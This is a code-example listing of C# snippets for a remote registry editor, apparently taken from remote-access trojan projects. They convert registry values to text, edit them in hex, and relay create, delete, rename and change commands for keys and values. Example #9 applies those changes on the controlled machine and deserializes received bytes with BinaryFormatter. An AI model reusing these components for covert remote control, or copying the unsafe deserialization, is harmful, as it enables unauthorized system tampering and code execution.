示例#1
0
        private string RegistryValueToString(RegValueData value)
        {
            switch (value.Kind)
            {
            case RegistryValueKind.Binary:
                return(value.Data.Length > 0 ? BitConverter.ToString(value.Data).Replace("-", " ").ToLower() : "(zero-length binary value)");

            case RegistryValueKind.MultiString:
                return(string.Join(" ", ByteConverter.ToStringArray(value.Data)));

            case RegistryValueKind.DWord:     // show hexadecimal and decimal
                return($"0x{value.Data:x8} ({ByteConverter.ToUInt32(value.Data).ToString()})");

            case RegistryValueKind.QWord:     // show hexadecimal and decimal
                return($"0x{value.Data:x8} ({ByteConverter.ToUInt64(value.Data).ToString()})");

            case RegistryValueKind.String:
            case RegistryValueKind.ExpandString:
                return(ByteConverter.ToString(value.Data));

            default:
                return(string.Empty);
            }
        }
示例#2
0
        private void CreateValue(object sender, string keyPath, RegValueData value)
        {
            TreeNode key = GetTreeNode(keyPath);

            if (key != null)
            {
                List <RegValueData> valuesFromNode = ((RegValueData[])key.Tag).ToList();
                valuesFromNode.Add(value);
                key.Tag = valuesFromNode.ToArray();

                if (tvRegistryDirectory.SelectedNode == key)
                {
                    RegistryValueLstItem item = new RegistryValueLstItem(value);
                    lstRegistryValues.Items.Add(item);
                    //Unselect all
                    lstRegistryValues.SelectedIndices.Clear();
                    item.Selected = true;
                    lstRegistryValues.LabelEdit = true;
                    item.BeginEdit();
                }

                tvRegistryDirectory.SelectedNode = key;
            }
        }
示例#3
0
        public FrmRegValueEditBinary(string keyPath, RegValueData value, Client c)
        {
            _connectClient = c;
            _keyPath       = keyPath;
            _value         = value;

            InitializeComponent();

            this.valueNameTxtBox.Text = value.Name;


            if (value.Kind == Microsoft.Win32.RegistryValueKind.Binary)
            {
                hexEditor.HexTable = (byte[])value.Data;
            }
            else if (value.Kind == Microsoft.Win32.RegistryValueKind.DWord)
            {
                hexEditor.HexTable = BitConverter.GetBytes((uint)(int)value.Data);
            }
            else if (value.Kind == Microsoft.Win32.RegistryValueKind.QWord)
            {
                hexEditor.HexTable = BitConverter.GetBytes((ulong)(long)value.Data);
            }
            else if (value.Kind == Microsoft.Win32.RegistryValueKind.String || value.Kind == Microsoft.Win32.RegistryValueKind.ExpandString)
            {
                //Convert string to bytes
                byte[] bytes = new byte[value.Data.ToString().Length *sizeof(char)];
                Buffer.BlockCopy(value.Data.ToString().ToCharArray(), 0, bytes, 0, bytes.Length);
                hexEditor.HexTable = bytes;
            }
            else if (value.Kind == Microsoft.Win32.RegistryValueKind.MultiString)
            {
                byte[] bytes = MultiStringToBytes((string[])value.Data);
                hexEditor.HexTable = bytes;
            }
        }
示例#4
0
 public DoChangeRegistryValue(string keyPath, RegValueData value)
 {
     KeyPath = keyPath;
     Value   = value;
 }
示例#5
0
 public RegistryValueLstItem(RegValueData value)
 {
     RegName = value.Name;
     Type    = value.Kind.RegistryTypeToString();
     Data    = RegValueHelper.RegistryValueToString(value);
 }
示例#6
0
        public void RegManager(Clients client, MsgPack unpack_msgpack)
        {
            try
            {
                switch (unpack_msgpack.ForcePathObject("Command").AsString)
                {
                case "setClient":
                {
                    FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
                    if (FM != null)
                    {
                        if (FM.Client == null)
                        {
                            client.ID         = unpack_msgpack.ForcePathObject("Hwid").AsString;
                            FM.Client         = client;
                            FM.timer1.Enabled = true;
                        }
                    }
                    break;
                }

                case "CreateKey":
                {
                    FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
                    if (FM != null)
                    {
                        string ParentPath = unpack_msgpack.ForcePathObject("ParentPath").AsString;
                        byte[] Matchbyte  = unpack_msgpack.ForcePathObject("Match").GetAsBytes();

                        FM.CreateNewKey(ParentPath, DeSerializeMatch(Matchbyte));
                    }
                    break;
                }

                case "LoadKey":
                {
                    FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
                    if (FM != null)
                    {
                        string rootKey     = unpack_msgpack.ForcePathObject("RootKey").AsString;
                        byte[] Matchesbyte = unpack_msgpack.ForcePathObject("Matches").GetAsBytes();

                        FM.AddKeys(rootKey, DeSerializeMatches(Matchesbyte));
                    }
                    break;
                }

                case "DeleteKey":
                {
                    FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
                    if (FM != null)
                    {
                        string rootKey = unpack_msgpack.ForcePathObject("ParentPath").AsString;
                        string subkey  = unpack_msgpack.ForcePathObject("KeyName").AsString;

                        FM.DeleteKey(rootKey, subkey);
                    }
                    break;
                }

                case "RenameKey":
                {
                    FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
                    if (FM != null)
                    {
                        string rootKey = unpack_msgpack.ForcePathObject("rootKey").AsString;
                        string oldName = unpack_msgpack.ForcePathObject("oldName").AsString;
                        string newName = unpack_msgpack.ForcePathObject("newName").AsString;

                        FM.RenameKey(rootKey, oldName, newName);
                    }
                    break;
                }

                case "CreateValue":
                {
                    FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
                    if (FM != null)
                    {
                        string            keyPath    = unpack_msgpack.ForcePathObject("keyPath").AsString;
                        string            Kindstring = unpack_msgpack.ForcePathObject("Kindstring").AsString;
                        string            newKeyName = unpack_msgpack.ForcePathObject("newKeyName").AsString;
                        RegistryValueKind Kind       = RegistryValueKind.None;
                        switch (Kindstring)
                        {
                        case "-1":
                        {
                            Kind = RegistryValueKind.None;
                            break;
                        }

                        case "0":
                        {
                            Kind = RegistryValueKind.Unknown;
                            break;
                        }

                        case "1":
                        {
                            Kind = RegistryValueKind.String;
                            break;
                        }

                        case "2":
                        {
                            Kind = RegistryValueKind.ExpandString;
                            break;
                        }

                        case "3":
                        {
                            Kind = RegistryValueKind.Binary;
                            break;
                        }

                        case "4":
                        {
                            Kind = RegistryValueKind.DWord;
                            break;
                        }

                        case "7":
                        {
                            Kind = RegistryValueKind.MultiString;
                            break;
                        }

                        case "11":
                        {
                            Kind = RegistryValueKind.QWord;
                            break;
                        }
                        }
                        RegValueData regValueData = new RegValueData();
                        regValueData.Name = newKeyName;
                        regValueData.Kind = Kind;
                        regValueData.Data = new byte[] { };

                        FM.CreateValue(keyPath, regValueData);
                    }
                    break;
                }

                case "DeleteValue":
                {
                    FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
                    if (FM != null)
                    {
                        string keyPath   = unpack_msgpack.ForcePathObject("keyPath").AsString;
                        string ValueName = unpack_msgpack.ForcePathObject("ValueName").AsString;

                        FM.DeleteValue(keyPath, ValueName);
                    }
                    break;
                }

                case "RenameValue":
                {
                    FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
                    if (FM != null)
                    {
                        string keyPath      = unpack_msgpack.ForcePathObject("keyPath").AsString;
                        string OldValueName = unpack_msgpack.ForcePathObject("OldValueName").AsString;
                        string NewValueName = unpack_msgpack.ForcePathObject("NewValueName").AsString;

                        FM.RenameValue(keyPath, OldValueName, NewValueName);
                    }
                    break;
                }

                case "ChangeValue":
                {
                    FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
                    if (FM != null)
                    {
                        string keyPath          = unpack_msgpack.ForcePathObject("keyPath").AsString;
                        byte[] RegValueDatabyte = unpack_msgpack.ForcePathObject("Value").GetAsBytes();

                        FM.ChangeValue(keyPath, DeSerializeRegValueData(RegValueDatabyte));
                    }
                    break;
                }
                }
            }
            catch { }
        }
示例#7
0
        private void OnValueChangedEventHandler(RegistryEditorAdapterHandler adapterHandler, string keyPath, RegValueData value)
        {
            TreeNode key = GetTreeNode(keyPath);

            if (key != null)
            {
                var regValue = ((RegValueData[])key.Tag).First(item => item.Name == value.Name);
                ChangeRegistryValue(value, regValue);

                if (tvRegistryDirectory.SelectedNode == key)
                {
                    var valueItem = lstRegistryValues.Items.Cast <RegistryValueLstItem>()
                                    .SingleOrDefault(item => item.Name == value.Name);
                    if (valueItem != null)
                    {
                        valueItem.Data = RegValueHelper.RegistryValueToString(value);
                    }
                }

                tvRegistryDirectory.SelectedNode = key;
            }
        }
示例#8
0
        public FrmRegValueEditBinary(string keyPath, RegValueData value, ClientMosaique c)
        {
            string[] convertToStrArr = null;
            byte[]   byteRewrited    = null;

            _connectClient = c;
            _keyPath       = keyPath;
            _value         = value;

            InitializeComponent();

            this.valueNameTxtBox.Text = RegValueHelper.GetName(value.Name);

            if (value.Data == null)
            {
                hexEditor.HexTable = new byte[] { };
            }
            else
            {
                if (value.Kind == RegistryValueKind.Binary)
                {
                    var      serializer           = new JavaScriptSerializer();
                    var      result               = serializer.DeserializeObject(value.Data);
                    object[] convertToObjectArray = (Object[])result;
                    byteRewrited = new byte[convertToObjectArray.Length];
                    int i = 0;
                    foreach (object obj in convertToObjectArray)
                    {
                        byteRewrited[i] = byte.Parse(obj.ToString());
                        i++;
                    }
                }
                if (value.Kind == RegistryValueKind.MultiString)
                {
                    var serializer = new JavaScriptSerializer();
                    var result     = serializer.DeserializeObject(value.Data);
                    var objVal     = (Object[])result;
                    convertToStrArr = new string[objVal.Length];
                    int i = 0;

                    foreach (object obj in objVal)
                    {
                        convertToStrArr[i] = obj.ToString();
                        i++;
                    }
                }

                switch (value.Kind)
                {
                case RegistryValueKind.Binary:
                    hexEditor.HexTable = (byte[])byteRewrited;
                    break;

                case RegistryValueKind.DWord:
                    try
                    {
                        var serializer = new JavaScriptSerializer();
                        var result     = serializer.DeserializeObject(value.Data);
                        hexEditor.HexTable = ByteConverter.GetBytes((uint)(int)result);
                    }catch { }
                    break;

                case RegistryValueKind.QWord:
                    hexEditor.HexTable = ByteConverter.GetBytes((ulong)(long.Parse(value.Data.ToString())));
                    break;

                case RegistryValueKind.MultiString:
                    hexEditor.HexTable = ByteConverter.GetBytes((string[])convertToStrArr);
                    break;

                case RegistryValueKind.String:
                case RegistryValueKind.ExpandString:
                    hexEditor.HexTable = ByteConverter.GetBytes(value.Data);
                    break;
                }
            }
        }
示例#9
0
        public RegManager(MsgPack unpack_msgpack)
        {
            try
            {
                switch (unpack_msgpack.ForcePathObject("Command").AsString)
                {
                case "LoadRegistryKey":
                {
                    string RootKeyName = unpack_msgpack.ForcePathObject("RootKeyName").AsString;
                    LoadKey(RootKeyName);
                    break;
                }

                case "CreateRegistryKey":
                {
                    string ParentPath = unpack_msgpack.ForcePathObject("ParentPath").AsString;
                    CreateKey(ParentPath);
                    break;
                }

                case "DeleteRegistryKey":
                {
                    string KeyName    = unpack_msgpack.ForcePathObject("KeyName").AsString;
                    string ParentPath = unpack_msgpack.ForcePathObject("ParentPath").AsString;
                    DeleteKey(KeyName, ParentPath);
                    break;
                }

                case "RenameRegistryKey":
                {
                    string OldKeyName = unpack_msgpack.ForcePathObject("OldKeyName").AsString;
                    string NewKeyName = unpack_msgpack.ForcePathObject("NewKeyName").AsString;
                    string ParentPath = unpack_msgpack.ForcePathObject("ParentPath").AsString;
                    RenameKey(OldKeyName, NewKeyName, ParentPath);
                    break;
                }

                case "CreateRegistryValue":
                {
                    string KeyPath    = unpack_msgpack.ForcePathObject("KeyPath").AsString;
                    string Kindstring = unpack_msgpack.ForcePathObject("Kindstring").AsString;
                    CreateValue(KeyPath, Kindstring);
                    break;
                }

                case "DeleteRegistryValue":
                {
                    string KeyPath   = unpack_msgpack.ForcePathObject("KeyPath").AsString;
                    string ValueName = unpack_msgpack.ForcePathObject("ValueName").AsString;
                    DeleteValue(KeyPath, ValueName);
                    break;
                }

                case "RenameRegistryValue":
                {
                    string OldValueName = unpack_msgpack.ForcePathObject("OldValueName").AsString;
                    string NewValueName = unpack_msgpack.ForcePathObject("NewValueName").AsString;
                    string KeyPath      = unpack_msgpack.ForcePathObject("KeyPath").AsString;
                    RenameValue(OldValueName, NewValueName, KeyPath);
                    break;
                }

                case "ChangeRegistryValue":
                {
                    byte[]          Valuebyte = unpack_msgpack.ForcePathObject("Value").GetAsBytes();
                    BinaryFormatter formatter = new BinaryFormatter();
                    MemoryStream    mStream   = new MemoryStream();
                    mStream.Write(Valuebyte, 0, Valuebyte.Length);
                    mStream.Flush();
                    mStream.Seek(0, SeekOrigin.Begin);
                    RegValueData Value = (RegValueData)formatter.Deserialize(mStream);
                    ChangeValue(Value, unpack_msgpack.ForcePathObject("KeyPath").AsString);
                    break;
                }
                }
            }
            catch (Exception ex)
            {
                Debug.WriteLine(ex.Message);
                Packet.Error(ex.Message);
            }
        }